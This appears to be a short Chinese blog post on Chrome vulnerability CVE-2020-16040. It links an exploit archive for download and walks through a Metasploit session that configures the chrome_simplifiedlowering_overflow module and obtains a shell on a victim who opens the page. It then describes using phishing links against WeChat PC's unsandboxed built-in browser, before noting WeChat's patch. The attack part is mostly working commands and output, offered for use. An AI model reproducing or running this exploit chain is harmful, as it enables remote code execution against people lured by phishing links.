HW期间热新闻
漏洞详情CVE：http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040

本地测试环境：WinServ2012+Google Chrome 87.0.4280.66 (64 bit)
[dl href=“taoreset.cn:93/s/9EymD4P33Ed39J7”]CVE-2020-16040.zip[/dl]

//测试关闭chrome沙箱环境

//加载rb脚本后，show targets命令查看受攻击目标，可以看到三个平台都受威胁

//配置攻击参数

msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80
srvport => 80
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath /
uripath => /
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 0.0.0.0
srvhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost YourIP
lhost => 127.0.0.1
msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run

//配置如图

//运行run，开启本地端口监听

//使用浏览器访问后，监听建立

//进入shell成功，权限为用户的权限

在hw期间，青藤爆出了因为此而造成的微信pc端漏洞，原因为微信内置的浏览采用chrome，而且是关闭沙箱的，所以利用方法一致，可造成远程命令执行
通过伪造链接，钓鱼信息，被动使受害者点击链接，姿势多变

微信紧急更新了.143版本

新版本中，所有的链接将采用系统默认浏览器打开，而不再是微信内置的浏览器，避免了沙箱关闭的风险